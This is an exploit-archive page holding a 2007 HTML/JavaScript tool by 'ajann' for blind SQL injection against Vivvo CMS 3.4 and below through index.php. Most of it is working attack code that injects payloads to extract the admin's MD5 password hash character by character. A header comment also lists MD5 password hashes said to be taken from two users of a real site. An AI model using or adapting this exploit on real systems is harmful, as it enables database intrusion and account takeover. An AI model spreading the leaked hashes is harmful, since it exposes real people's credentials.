exploit the possibilities

vivvocms-sql.txt

vivvocms-sql.txt
Posted Jul 19, 2007
Authored by ajann

Vivvo CMS versions 3.4 and below remote blind SQL injection exploit that makes use of index.php.

tags | exploit, remote, php, sql injection
MD5 | 2660905f777e3fa82f3e0bee7d57dcab

vivvocms-sql.txt

Change Mirror Download
<html>
<head>
<title>Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit</title>

<script type="text/javascript">

//'===============================================================================================
//'[Script Name: Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit
//'[Coded by : ajann
//'[Author : ajann
//'[Contact : :(
//'[S.Page : http://www.vivvo.net/
//'[$$ : $ 195
//'[Using : Write Target after Submit Click
//'[TR : \* 3 aydir beklettigim acigi artiq yayinlayayim dedim yontemi anlama
yablirsiniz exp biraz karisiktir ayrýyeten zamanýnda bu acigi denediðim
bir turk sitesi olan heykhaberden aldiim 1. ve 2. uyenin md5leri;
UserID:1 // 473a0029306b7435bed66350a16fcca8
UserId:2 // f4f532fa737f55a4d54bf20c2d70d331
/*
//'===============================================================================================


function nesneyarat() {

var nesne;
var tarayici = navigator.appName;


if(tarayici == "Microsoft Internet Explorer"){
nesne = new ActiveXObject("Microsoft.XMLHTTP");
}
else {
nesne = new XMLHttpRequest();

}
return nesne;
}

var http = nesneyarat();



function islemlink(adresyolla,charyolla) {

genreidim=document.getElementById('genreid').value
file="/index.php?category=" + genreidim
pathim=document.getElementById('path').value + file
karakterim=document.getElementById('karakter').value + charyolla
adres=document.getElementById('adresim').value + pathim + adresyolla + karakterim




http.open('get', adres);
http.onreadystatechange = cevapFonksiyonu;
http.send(null);


}



function cevapFonksiyonu() {
if(http.readyState == 4){
document.getElementById('mesaj').value = http.responseText;
yonlendir();

}
}



function yonlendir() {

if (document.getElementById('mesaj').value.indexOf('<span class="plainTxtGray">', 0) == -1) {
alert('False');


}

if (document.getElementById('mesaj').value.indexOf('<span class="plainTxtGray">', 0) != -1) {
alert('TRUEEEEEEE');
}



}

function dal() {

if (document.getElementById('buton').value == "Test Character(0)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(1)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=49)/*');
document.getElementById('buton').value = "Test Character(2)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(2)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=50)/*');
document.getElementById('buton').value = "Test Character(3)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(3)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=51)/*');
document.getElementById('buton').value = "Test Character(4)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(4)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=52)/*');
document.getElementById('buton').value = "Test Character(5)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(5)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=53)/*');
document.getElementById('buton').value = "Test Character(6)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(6)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=54)/*');
document.getElementById('buton').value = "Test Character(7)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(7)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=55)/*');
document.getElementById('buton').value = "Test Character(8)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(8)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=56)/*');
document.getElementById('buton').value = "Test Character(9)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(9)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=57)/*');
document.getElementById('buton').value = "Test Character(a)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(a)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=97)/*');
document.getElementById('buton').value = "Test Character(b)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(b)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=98)/*');
document.getElementById('buton').value = "Test Character(c)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(c)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=99)/*');
document.getElementById('buton').value = "Test Character(d)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(d)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=100)/*');
document.getElementById('buton').value = "Test Character(e)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(e)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=101)/*');
document.getElementById('buton').value = "Test Character(f)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}

if (document.getElementById('buton').value == "Test Character(f)") {

document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=102)/*');
document.getElementById('buton').value = "Finished"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

}



}


</script>

</head>

<body bgcolor="#000000">

<center>

<p><b><font face="Verdana" size="2" color="#008000">Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit</font></b></p>

<p></p>
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/</font><font color="#00FF00" size="2" face="Arial">
</font><font color="#FF0000" size="2">&nbsp;</font></b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<input type="text" name="adresim" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="http://"></p>
<br>
<b><font face="Arial" size="1" color="#FF0000">&nbsp;Path:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]&nbsp;&nbsp;&nbsp; </font></b>
<input type="text" name="path" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="/">
<p>
<b><font face="Arial" size="1" color="#FF0000">&nbsp;Character:</font><font face="Arial" size="1" color="#808080">[Md5
Character 1-32]&nbsp;&nbsp; </font></b>
<input type="text" name="karakter" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
<p>
<b><font face="Arial" size="1" color="#FF0000">Category Id:</font><font face="Arial" size="1" color="#808080">[index.php?category=]&nbsp;&nbsp; </font></b>
<input type="text" name="genreid" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
<p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p>
<br>
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden"></textarea> <br>
<p>

<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</p>
</center>


</body>
</html>


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close